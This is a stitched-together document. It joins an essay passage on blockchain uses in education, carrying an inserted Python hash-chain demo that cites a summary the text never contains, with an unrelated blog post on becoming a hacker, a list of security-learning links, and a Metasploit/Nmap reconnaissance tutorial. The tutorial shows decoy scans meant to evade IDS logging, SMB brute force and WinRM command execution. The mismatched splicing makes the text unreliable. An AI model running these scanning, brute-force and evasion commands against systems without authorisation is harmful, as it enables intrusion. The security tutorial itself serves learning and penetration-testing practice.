(1) Strengthen the protection of intellectual property rights and build an educational trust system. The traceability of digital currency can reduce banks’ expenditure on compliance verification and auditing such as anti-money laundering and anti-fraud, and effectively control illegal activities such as tax evasion and money laundering. In the field of education, the traceability of blockchain technology can be used to protect the copyright of educational assets and intellectual achievements and to resolve intellectual property disputes at the source. In addition, digital currency stored on a blockchain has high security and reliability. In the field of education, important information such as student grades, personal files and academic certificates can be stored on a blockchain to prevent it from being lost or maliciously tampered with, building a safe, credible and tamper-resistant student credit system and helping to solve the current problems of lacking student credit records and global academic fraud.
(2) Optimize the educational business process to achieve efficient and low-cost educational resource transactions. In terms of cross-border payment, the blockchain uses the characteristics of decentralization to abandon the role of intermediary banks and realize point-to-point fast and low-cost cross-border payments. In terms of educational resource sharing, the use of distributed ledger technology to realize the direct connection between users and resources can simplify the operation process and improve the efficiency of resource sharing, so as to promote the open sharing of educational resources and solve the problem of resource islands. In terms of educational resource transactions, the use of decentralized features eliminates transaction intermediary platforms and realizes point-to-point connections between consumers and resources, thereby reducing expenses, simplifying operating procedures, and creating an efficient and low-cost educational resource transaction platform.
(3) Use the characteristics of decentralization to build a decentralized education system. Blockchain technology is applied to supply chain finance: by eliminating intermediate transaction agencies and reducing human intervention, costs and operational risks are reduced. Wave has reached a cooperation agreement with Barclays Bank to put the letter of credit, bill of lading number and documents of the international trade process on a public chain and to perform authentication and tamper-resistant verification through that public chain, establishing completely transparent “rules of the game” and thereby decentralizing the verification rules. In the field of education, blockchain can be used to develop a decentralized education system, breaking the monopoly of schools or government agencies on traditional education services, so that any institution with educational qualifications can provide educational services and issue valid academic certificates. The effective integration of formal and non-formal education promotes reform of the education system toward participation by all.
(4) Distributed storage and recording of credible learning data to achieve efficient connection between schools and enterprises. Blockchain technology makes the securities trading market more open, transparent, green, fair and efficient, turning the traditional model that was highly dependent on intermediaries into a decentralized, flat network transaction model, and realizing distributed storage and recording of data. In the field of education, students’ personal information, academic performance, growth records and other content can be stored in a similar way, distributed across the education system, and shared with other schools or recruiting units on the basis of ensuring the authenticity and security of the information, with that data serving as an important basis for student job interviews. Distributed ledger technology can be used to show employers students’ academic achievements and professional skills, build a bridge for communication between students and enterprises, and establish a new model of school-enterprise cooperation, so as to connect students and employers efficiently.
(5) Develop educational smart contracts and build a new mode of network resource and platform operation. Smart contract technology in the blockchain can automate a large number of manual and semi-manual verification and management tasks in the current financial transaction process and make the transaction system more intelligent. In the construction of open educational resources, the transparency and automatic execution of smart contracts can automate resource uploading, certification, transfer, sharing and so on, reduce the cost of resource sharing, improve its efficiency, and build a new form of network resource circulation. In addition, smart contracts can be used to build an efficient and intelligent online learning community, realize its “self-organized” operation, monitor the community’s ecological environment in real time, automatically block and delete inappropriate speech, and create a positive community atmosphere.
Challenge of Using Blockchain in Education
Blockchain technology achieves an anonymity effect by separating the transaction address from the real identity of the address holder, which prevents the transparency of transaction information from disclosing user privacy directly. However, by observing and tracking block information and user IDs, it is still possible to trace back to a user’s personal information. Therefore, applying blockchain technology in the field of education carries the risk that the privacy of teachers and students is leaked, mainly in two respects. First, all transaction information is open and transparent; any information can be tracked and queried, and from it certain conclusions can be inferred or the status and behavior of teachers and students predicted, which is not conducive to protecting their personal privacy. Second, the security of the blockchain is guaranteed by algorithms: in theory, data can only be altered if more than 51% of the nodes are compromised at the same time; however, with the development of mathematics, cryptography and computing technology, it is difficult to guarantee that the algorithm will not be broken in the future, which would result in the leakage of teacher and student information.
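The two claims made above, that chained storage makes records such as grades tamper-evident (point (1) and the Medium/Mirror summary) and that a public, transparent chain is a privacy risk, can both be seen in a few dozen lines. The following is an added example, not code from the original post or from any blockchain project: a single-node SHA-256 hash chain with no consensus layer, and the helper names (`commit`, `Ledger`, `guess_unsalted`, the constructed `school-A` / `stu-0001` identifiers) are this example’s own assumptions. Only a salted commitment of each record goes on the chain; the record and its salt stay with the issuer and the student.

```python
import hashlib
import json
from dataclasses import dataclass
from typing import Iterable, Optional


def canonical(record: dict) -> bytes:
    """Canonical JSON so the same record always hashes to the same bytes."""
    return json.dumps(record, sort_keys=True, separators=(",", ":")).encode()


def commit(record: dict, salt: bytes) -> str:
    """Salted SHA-256 commitment; the salt stays off-chain with the record."""
    return hashlib.sha256(salt + canonical(record)).hexdigest()


def unsalted_hash(record: dict) -> str:
    """What a naive design would publish: the bare hash of the record."""
    return hashlib.sha256(canonical(record)).hexdigest()


@dataclass
class Block:
    index: int
    prev_hash: str
    commitment: str      # the only record-derived value stored on the chain
    issuer: str          # pseudonymous issuer id (constructed, not a real identity)
    block_hash: str = ""

    def compute_hash(self) -> str:
        header = f"{self.index}|{self.prev_hash}|{self.commitment}|{self.issuer}"
        return hashlib.sha256(header.encode()).hexdigest()


class Ledger:
    """Append-only hash chain on one node: tamper-evident, not tamper-proof."""

    def __init__(self) -> None:
        genesis = Block(0, "0" * 64, "", "genesis")
        genesis.block_hash = genesis.compute_hash()
        self.blocks = [genesis]

    def append(self, commitment: str, issuer: str) -> int:
        prev = self.blocks[-1]
        block = Block(len(self.blocks), prev.block_hash, commitment, issuer)
        block.block_hash = block.compute_hash()
        self.blocks.append(block)
        return block.index

    def first_broken_block(self) -> Optional[int]:
        """Index of the first block whose own hash or back-link no longer
        matches, or None when the whole chain is intact."""
        for i, block in enumerate(self.blocks):
            if block.block_hash != block.compute_hash():
                return i
            if i > 0 and block.prev_hash != self.blocks[i - 1].block_hash:
                return i
        return None


def verify_presented_record(ledger: Ledger, index: int, record: dict, salt: bytes) -> bool:
    """A recruiter's check: chain intact and the presented record plus salt
    reproduces the commitment stored at the claimed position."""
    if ledger.first_broken_block() is not None:
        return False
    return ledger.blocks[index].commitment == commit(record, salt)


def guess_unsalted(public_hash: str, template: dict, field: str,
                   candidates: Iterable[str]) -> Optional[str]:
    """The privacy caveat: an unsalted hash of a low-entropy record (a grade
    is one of a handful of letters) is recovered by anyone reading the chain
    simply by hashing each possible value. Salting prevents this."""
    for value in candidates:
        if unsalted_hash(dict(template, **{field: value})) == public_hash:
            return value
    return None


if __name__ == "__main__":
    ledger = Ledger()
    record = {"student": "stu-0001", "course": "CS101", "grade": "B"}   # constructed
    salt = b"constructed-salt-0001"
    idx = ledger.append(commit(record, salt), "school-A")
    print("intact:", ledger.first_broken_block() is None)
    print("record verifies:", verify_presented_record(ledger, idx, record, salt))
    ledger.blocks[idx].commitment = commit(dict(record, grade="A"), salt)
    ledger.blocks[idx].block_hash = ledger.blocks[idx].compute_hash()
    ledger.append(commit({"student": "stu-0002", "course": "CS101", "grade": "C"}, b"s2"), "school-A")
    print("first broken block after edit:", ledger.first_broken_block())
    print("unsalted grade recovered:", guess_unsalted(unsalted_hash(record), record, "grade", "ABCDF"))
```

Note what the example does and does not show: rewriting one block and recomputing its hash is caught only because a later block still points at the old hash, so a single operator who controls every copy of the chain could rewrite all of them; the distributed replication and consensus that the text attributes to real blockchains is exactly what turns this tamper-evidence into tamper resistance. The `guess_unsalted` function is the concrete form of the first privacy risk above: with the record published as a bare hash, a pseudonymous student id and a public chain are enough for an observer to learn the grade.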
Twitter: @jimmwayans | www.jimmwayans.com

How to be a Hacker or a Cybersecurity Expert?
So you want to be a Hacker?
Recently I’ve been reading a ton of questions, posts and general discussion about getting into the ‘Information Security’ game, and in my opinion at least it’s typically followed up by a fair amount of misleading information. That might be a little harsh considering I’m sure it’s well intentioned, and it’s even possible that the advice worked for them (there is no one-size-fits-all advice), but I thought I’d lay my thoughts out here in the hope of helping a new budding hacker or infosec enthusiast move forward.
I want to play sport, where should I start?
This vague, open-ended and very ambiguous question is very similar to someone asking how they should go about getting into information security. The first thing to realize is that there is a huge range of information security fields, and within each of those huge fields is a lifetime’s worth of learning content. Just like picking a sport there is no ‘best’; there are simply areas you may enjoy more than others. Off the top of my head here are some example areas, by no means exhaustive:
- Web Application Security
- Mobile Application Security
- Reverse Engineering
- Malware Reverse Engineering
- Cloud Security
- Network Security
- Incident Response
- Hardware Hacking
- IoT Hacking
- Risks, Governance and Compliance
- Programming / Creating Tools for Others
- Exploit Development
- Forensics
- etc…
Some of these are more technical in nature while others have a more theoretical focus. I guarantee that whatever you like, there are others out there who will find it boring, just as you sometimes will with what others are interested in. Right now it’s expected that if you’re reading this you may know very little about any of these areas, but what’s important is your willingness to learn and what type of motivation you have.
The Hacking Type
One trademark that is almost universal among people throughout those fields is their focus on independent, self-directed learning. Unfortunately in some ways security is still considered a ‘dark art’: I mean, why would anyone want to know how to break into a computer system unless they were going to do so? As a result plenty of people will show anything from disdain to outright hostility when asked security-related questions, under the false (perhaps sometimes true) assumption that it’s merely a ‘script kiddie’ looking to learn to hack systems instead of someone wanting to learn and use that knowledge for a good purpose. It’s also a fact that the ‘learning’ resources of information security are quite disjointed, with no real central repository of learning material.
The point of highlighting this is that if you wish to prosper and successfully enter the information security field you should be prepared to jump in and find your way without waiting for someone to hold your hand and lead you down the right path. Google some of the above terms and see what sounds like fun. Despite what sometimes seems like a constant battle to find the ‘best’ field to learn, or the ‘best’ resource, or the ‘best’ way to learn, often more time is spent procrastinating over these questions than dedicating the time to actually learning. Look up videos on YouTube for hacking examples – it’s ok if you don’t know what a lot of it means, but write down a list and then Google those terms. Use points of interest to spawn an ever-increasing web of knowledge around the topics you’re interested in.
Do I need to learn X first?
Of course you need to have full knowledge of the OSI layers before you begin. Yes, you need to read that 1000-page book on the TCP protocol. Yes, you need to be proficient in 5 programming languages (at least!) before you consider hacking. Can you compile your own Linux kernel from source code? No? Don’t bother learning hacking. Actually… all of that is rubbish, yet it’s one of the most common responses given to people looking to learn information security. There is one requirement to becoming a decent hacker – interest. The difference between a future hacker and a script kiddie isn’t knowledge, it’s the willingness to learn.
As long as you have a vague idea of how to use a computer you’re at a starting point you can work with. Yes, if you don’t have a solid understanding of how TCP works you should have that on your to-do list to look up when someone is talking about it in a hacking tutorial – but it’s ridiculous to think you need a ton of prerequisite knowledge before you’re allowed to start learning about topics you’re interested in. When you’re looking up how that login puzzle works on a hacking site and it uses JavaScript, you’re going to learn how JavaScript works. When you read through how a buffer overflow works and it has a Python template, you’ll learn some basics of Python. No, you won’t get a job as a developer in those languages at the end of it, but you’ll pick up the common ways to break the language.
Informal Learning
“Ok, I get the hint – I need to learn things myself, but can you at least give me a starting point?”
Sure, there are a ton of great free or cheap resources out there to get started depending on what topic appeals to you. Here are some examples.
Web Application Security
- HackThisSite – Good for some basic web based challenges (link)
- Enigma Group – Similar to Hack this site (link)
- Hack The Box – A massive, online cybersecurity training platform (link)
- OWASP Top 10 – Idea of what are the most common vulnerabilities (link)
- TryHackMe – a free online platform for learning cyber security (link)
- OWASP Broken Web Apps – A virtual machine you can load up to practice hacking skills on your own network (link)
- Pentesting Lab – Another web focused virtual machine (link)
- In fact anything from vulnhub that interested you is good (link)
- The Web Application Hackers Handbook – The book on web hacking and vulnerabilities (link)
Reverse Engineering / Malware Reversing
- Lena’s Tutorials – Known as pretty much one of the best introductions to reverse engineering (link)
- The Legends of Random – Again another solid set of tutorials for reverse engineering (link)
- Reversing: Secrets of Reverse Engineering – A good book on the foundations of reverse engineering (link)
- Practical Malware Analysis – A great book focusing on reversing malware (link)
- Malware Analysts Cookbook – Another book focusing on reversing malware (link)
Network Security
- Virtual Machines dominate this category as they allow you to practice against real machines. Head to vulnhub and download any VM that looks interesting (link)
- Metasploit Unleashed – A solid run-through of the Metasploit testing framework, to be used in conjunction with VMs (link)
- The Basics of Hacking and Penetration Testing – A very basic look at penetration testing useful for those completely new to the field. (link)
- Metasploit – The Penetration Testers Guide – Another book focusing around the use of metasploit in penetration testing (link)
- Because this is such a huge field, it is often best to break it down into one aspect and then research that aspect specifically. Blogs are your best friend here. (link)
Exploit Development
- Corelan – This is by far the best resource out there for learning about exploit development. (link)
- FuzzySecurity – Another good learning resource with some tutorials available (link)
- Exploit-DB – One of the best things you can do is find examples of exploits (often with apps attached) and try and replicate the exploit independently (link)
- Hacking – The Art of Exploitation – A fantastic book that covers tons of different exploitation techniques (link)
- The Shellcoders Handbook – Another fantastic book on exploit development and shellcoding (link)
Other than that, Google, Google, and some more Google. I’ve left off some areas such as forensics and compliance because personally I’m not interested in them so I haven’t gone looking for resources; I’m sure there are some fantastic ones out there.
Formal Learning
Outside of the free resources you can also begin to get certificates to make yourself more appealing to employers if you wish to transition into the field as more of a career path. One certification I’d highly recommend is the “Penetration Testing with Kali Linux” course from Offensive Security (link) if you’re interested in network security. It’s easily one of the best learning experiences I’ve ever had in the field and taught me more in 60 days than I’d learnt in a year on my own. Their “Cracking the Perimeter” is also a great course, focusing a little more on exploit development (link).
If you’re looking at developing your programming skills, something like SecurityTube’s “Python for Pentesters and Hackers” (link) is a great foundation that will teach you how to do plenty of nifty things like building your own port scanners, password crackers etc. I don’t place a huge value on the certifications they offer from an employment perspective, but I’d look at it more as a consolidated lump of knowledge and examples for sale, which can still be valuable.
The “Certified Ethical Hacker” course is another commonly mentioned one. Honestly it’s typically looked down upon so I don’t think it’s necessarily worth the money – but if you need a formal course to learn things then it might be worth the money to you. A lot of these certifications and their value are discussed over at TheEthicalHacker.net’s forums located here.
“Just seeing if you can”
Hacking is all about gaining access to things that we’re not meant to. Creating an exploit, finding a SQL injection, password cracking: it’s all designed to move us towards the goal of taking control of the box we’re attacking. I guarantee almost every new hacker has started dreaming about “just seeing if they can” get access to that school website, “just seeing if they can” gain access to the neighbor’s WiFi network, sending their friend a trojan “just to see if they can” take control. Worse still you might end up visiting places like HackForums.net and seeing a lot of people trying to infect others with RATs, build botnets etc. under the impression that this is hacking, or sadly that this is the only way you can learn.
I need to emphasize that this is not the case. Any type of “just seeing if you can” type exercises can be replicated through the use of virtual machines, your own routers or even capture the flag / wargame competitions out there. Being realistic even if you can access another person’s machine, what are you going to do with it? Are you really going to try and steal credit card details and make fraudulent transactions? Are you really going to steal passwords and be paranoid that your activity is going to be traced back to you for the sake of peeking at someone’s emails? There have been plenty of examples of newbies being charged, not realizing the seriousness of the crimes they are committing. If you went for a job with the FBI and they had a look through your post history would you like them to read that post about you asking how to host a botnet? It’s a classic example of what’s on the internet is forever, and if you really want a career in information security you need that clean record to obtain any security clearances you’re going to need to do your job. Getting caught for stupid stuff just isn’t worth it.
Summary
So after a long ramble, what are the key points?
- A hacker will actively seek out information, not wait for others to give it to him
- The difference between a script kiddie and a new hacker is the desire to learn
- You need to experiment with a wide range of information security fields to find what interests you
- Don’t let anyone tell you that there are prerequisites for learning information security; there aren’t.
- It’s not worth “just seeing if you can” do anything that isn’t legal, the risk vs reward makes no sense for doing so
- With courses, wargames, capture the flags and more importantly virtual machines there is no hacking scenario that can’t be replicated legally
Have fun, sorry if it got preachy towards the end and enjoy pwning boxes! Information security is an awesome field and you’ll be learning something new every day that you’re involved in it. There is no right answer for getting into the field apart from jumping into it with both feet. Get wet, learn to tread water and stay afloat, one day you might even be able to swim a little!
Find me on twitter @jimmwayans

Information/Cyber Security Cheat Sheet
This is a collection of links and resources I have found or been told about over the years. I developed this post in the hope of mapping out good resources in the industry and facilitating the spread of knowledge, no matter the skill level.
If you spot any errors, or any links need adding / updating / removing, please contact me via Twitter @jimmwayans (https://twitter.com/jimmwayans).
CTF Site Links
The King Of CTF Pages – https://ctftime.org/
247CTF – https://247ctf.com
HackTheBox – https://hackthebox.eu/
RootMe – https://root-me.org/
0x0539 – https://0x0539.net/
Laptop Hacking Coffee – https://ctf.laptophackingcoffee.org/
pwnable tw – http://pwnable.tw/ (Only BinExp)
pwnable kr – http://pwnable.kr/ (Only BinExp)
PicoCTF – https://picoctf.com/ (Beginner friendly)
reversing kr – http://reversing.kr/
The Stereotyped Challenges – https://chall.stypr.com/
SDSLabs CTF – https://backdoor.sdslabs.co/
Payload Cheat Sheets
PayloadsAllTheThings – https://github.com/swisskyrepo/PayloadsAllTheThings
BurpSuite XSS Cheat Sheet – https://portswigger.net/web-security/cross-site-scripting/cheat-sheet
OSCP Preparation
Sam’s Review / Guide – https://coffeejunkie.me/OSCP-Exam-Overview/
R4J Buffer Overflow – https://github.com/r4j0x00/oscp-like-stack-buffer-overflow
Computerphile BoF Explanation – https://www.youtube.com/watch?v=1S0aBV-Waeo
g0tm1lk Linux Priv Esc Cheat Sheet – https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/
Windows Priv Esc – https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/
Windows Priv Esc (built around OSCP) – https://sushant747.gitbooks.io/total-oscp-guide/privilege_escalation_windows.html
SAST Practice Pages
Secure Code Warrior – https://securecodewarrior.com/
ExploitDB (May require imagination) – https://www.exploit-db.com/
All Around Practical Learning (non-competitive)
OWASP Juice Shop – https://owasp.org/www-project-juice-shop/
Pentester Labs – https://pentesterlab.com/
OverTheWire – https://overthewire.org/ (Beginner friendly)
Pentester Academy – https://www.pentesteracademy.com/
PortSwigger Labs – https://portswigger.net/web-security
CTFLearn – http://ctflearn.com/
VulnHub – http://vulnhub.com/
Hacker101 – https://www.hacker101.com/
OSINTme – https://osintme.com/
All Around Theory Learning (non-competitive)
OWASP – https://owasp.org/
BurpSuite Research – https://portswigger.net/research
HumbleBundle Cyber Security Books – https://www.humblebundle.com/books/cybersecurity-2020-wiley-books?hmb_source=navbar&hmb_medium=product_tile&hmb_campaign=tile_index_4
Free SANS courses for the fundamentals – https://www.cyberaces.org/courses.html
Relevant Blogs / Podcasts
Security Weekly – https://securityweekly.com/category-shows/application-security-weekly/
Darknet Diaries – https://darknetdiaries.com/
TheManyHatsClub – https://themanyhats.club/
0x00Sec (Community Blog) – https://0x00sec.org/
Secret Club – https://secret.club/
g0tm1lk – https://blog.g0tmi1k.com/
Cybering – https://cybering.cc/
Twitch Hacking Channels (English)
TheBlindHacker – https://www.twitch.tv/theblindhacker
GeoHotz – https://www.twitch.tv/georgehotz
LiveOverflow – https://www.twitch.tv/LiveOverflow
Twitch Hacking Channels (Spanish)
S4vitar – https://www.twitch.tv/s4vitaar
Youtube Channels Pentesting (English)
HackerSploit – https://www.youtube.com/channel/UC0ZTPkdxlAKf-V33tqXwi3Q
IppSec – https://youtube.com/ippsec
TheCyberMentor – https://www.youtube.com/channel/UC0ArlFuFYMpEewyRBzdLHiw
LiveOverflow – https://www.youtube.com/channel/UClcE-kVhqyiHCcjYwcpfj9w
Computerphile – https://www.youtube.com/user/Computerphile
Relevant Discord Servers and Communities
TheManyHatsClub – https://discord.gg/infosec
ThugCrowd – https://thugcrowd.com/
LaptopHackingCoffee – https://laptophackingcoffee.org/doku.php?id=start
HackTheBox – https://discord.gg/hRXnCFA
0x00Sec – https://discord.gg/PHM9Wak (https://0x00sec.org)
John Hammond Discord – https://discord.gg/Kgtnfw4
ReSwitched – https://discordapp.com/invite/ZdqEhed
ur-hackr – https://ur-hackr.com/
Companies Offering Certificates
ELearnSecurity – https://elearnsecurity.com/
Pentester Academy – https://www.pentesteracademy.com/
Offensive Security – https://www.offensive-security.com/
HackTheBox – https://hackthebox.eu/
Other Relevant Links
The Cybrary – https://www.cybrary.it/
CyberFirst – https://www.ncsc.gov.uk/cyberfirst/
Mind Map Everything – https://www.amanhardikar.com/mindmaps.html
Events around London – https://medium.com/@securestep9/cybersecurity-infosec-appsec-meetups-events-in-london-3688c4a42ea6
Razvi’s List of Hacking Sites – https://razvioverflow.github.io/starthacking
Peerlyst – https://www.peerlyst.com/
CTFs for beginners – https://twitter.com/JenF3rr_/status/1208577793359003648
HackerOne Bugbounty page – https://hackerone.com/
Using Twitter for InfoSec – https://dev.to/vickilanger/that-s-it-that-s-the-tweet-send-3e0h
CVE feed from MITRE – https://cve.mitre.org/

Active Information Gathering with Metasploit-Framework
Using Nmap to perform port scanning
The -sT scan mode is the default scanning mode of Nmap. The state of each target port is judged accurately by completing the full TCP three-way handshake. Because a complete connection is established for every port, the scan is very easy for the target’s firewall to record.
msf> nmap -sT 127.0.0.1
The -sS scan mode does not complete the three-way handshake; it is called a half-open scan, also known as a stealth scan. Compared with the TCP connect scan it is faster and stealthier.
msf> nmap -sS 127.0.0.1
The -sU scan mode is the fastest scan method, because UDP only involves a send and a receive with no handshake, but its results may differ somewhat from those of the two scan modes above.
msf> nmap -sU 127.0.0.1
Operating system identification.
Nmap can identify the target operating system in two ways:
1. The commonly used -O parameter. -O is an advanced option provided by Nmap and is usually used on its own.
msf> nmap -O 127.0.0.1
2. The -sV parameter can be combined with the port scan options above; Nmap then appends the version identification result to each port in the scan output.
msf> nmap -sSV 127.0.0.1
Nmap security scan
Usually a scan launched against the target site or host is recorded by the WAF or IDS, which is very unsafe for the tester, so hiding the source IP of intrusive and deceptive scans is necessary. Nmap provides the advanced -D parameter for this: if you supply 2 decoy IP addresses, Nmap leaves 3 IP addresses in the WAF log (the two decoys plus the real one), confusing whoever reviews it and protecting the tester as far as possible.
msf> nmap -sS 127.0.0.1 -D 10.10.20.100,10.10.20.101
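From the defender’s side, the scans above leave a recognisable trace: one source touching many ports, and for a -D decoy scan several sources whose probe sequences coincide. The following is an added example, not code from the original post: a small Python detector run over constructed firewall-style log lines (the log format, addresses and thresholds are assumptions).

```python
import re
from collections import defaultdict

# Constructed sample of kernel-style firewall log lines (not real traffic).
# Each line: "<epoch> SRC=<ip> DST=<ip> PROTO=TCP DPT=<port> FLAGS=<tcp flags>"
# One real scanner plus two decoys sweep ten ports; one host does normal logins.
SCAN_PORTS = [21, 22, 23, 25, 80, 110, 139, 443, 445, 3389]
SAMPLE_LOG = [
    f"{1000 + i} SRC={src} DST=192.0.2.10 PROTO=TCP DPT={port} FLAGS=S"
    for i, port in enumerate(SCAN_PORTS)
    for src in ("203.0.113.5", "198.51.100.7", "198.51.100.8")
] + [
    "1003 SRC=192.0.2.50 DST=192.0.2.10 PROTO=TCP DPT=22 FLAGS=S",   # ordinary SSH
    "1010 SRC=192.0.2.50 DST=192.0.2.10 PROTO=TCP DPT=443 FLAGS=S",  # ordinary HTTPS
]

LINE_RE = re.compile(r"^(\d+) SRC=(\S+) DST=(\S+) PROTO=TCP DPT=(\d+) FLAGS=(\S+)$")

def parse_line(line):
    """Return (ts, src, dst, dport, flags), or None for lines that do not match."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts, src, dst, dport, flags = m.groups()
    return int(ts), src, dst, int(dport), flags

def port_scanners(lines, min_ports=8):
    """Sources that sent SYNs to at least `min_ports` distinct ports on one host.
    A -sT sweep would additionally show up in the application's own logs; a -sS
    sweep is only visible here, because the handshake is never completed."""
    ports = defaultdict(set)
    for ts, src, dst, dport, flags in filter(None, map(parse_line, lines)):
        if flags == "S":
            ports[(src, dst)].add(dport)
    return {src for (src, dst), p in ports.items() if len(p) >= min_ports}

def decoy_groups(lines, scanners):
    """Group scanners whose (timestamp, port) sequences are identical at second
    granularity: the signature of one nmap -D run, where only one address is real."""
    seq = defaultdict(list)
    for ts, src, dst, dport, flags in filter(None, map(parse_line, lines)):
        if src in scanners:
            seq[src].append((ts, dport))
    by_seq = defaultdict(set)
    for src, s in seq.items():
        by_seq[tuple(sorted(s))].add(src)
    return [sorted(g) for g in by_seq.values() if len(g) > 1]

if __name__ == "__main__":
    found = port_scanners(SAMPLE_LOG)
    print("scanners:", sorted(found))
    print("decoy groups:", decoy_groups(SAMPLE_LOG, found))
```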
1. TCP port scan
msf> use auxiliary/scanner/portscan/tcp
2. SYN port scan
msf> use auxiliary/scanner/portscan/syn
3. Call nmap
In metasploit-framework use db_nmap to do a complete banner grabbing, use the following command:
msf> db_nmap -Pn -sTV -T4 --open --min-parallelism 64 --version-all -p - 127.0.0.1
The -Pn parameter tells Nmap that the target has already been determined to be online, so host discovery is skipped. -sTV means a TCP connect scan that also determines the banner and version of the service on each port. The --min-parallelism 64 parameter runs at least 64 probes in parallel, --version-all makes Nmap use all of its version probes to identify service details, and setting -p to - scans all ports on the target.
4. Use ARP for live host scanning
msf> use auxiliary/scanner/discovery/arp_sweep
msf> set RHOSTS <target range>
msf> set THREADS 10
msf> run
5. Use UDP to detect live hosts
msf> use auxiliary/scanner/discovery/udp_sweep
msf> set RHOSTS <target range>
msf> set THREADS 10
msf> run
6. Use SMB to detect live hosts
msf> use auxiliary/scanner/smb/smb_enumshares
msf> set RHOSTS <target range>
msf> set THREADS 10
msf> run
7. SMB version scan
msf> use auxiliary/scanner/smb/smb_version
8. SMB brute force (dictionary required)
msf> use auxiliary/scanner/smb/smb_login
9. SSH version scan
msf> use auxiliary/scanner/ssh/ssh_version
10. FTP version scan
msf> use auxiliary/scanner/ftp/ftp_version
11. SMTP enumeration
msf> use auxiliary/scanner/smtp/smtp_enum
12. SNMP enumeration
msf> use auxiliary/scanner/snmp/snmp_enum
13. SNMP login
msf> use auxiliary/scanner/snmp/snmp_login
14. WinRM scan
msf> use auxiliary/scanner/winrm/winrm_auth_methods
15. WinRM command execution (valid credentials required)
msf> use auxiliary/scanner/winrm/winrm_cmd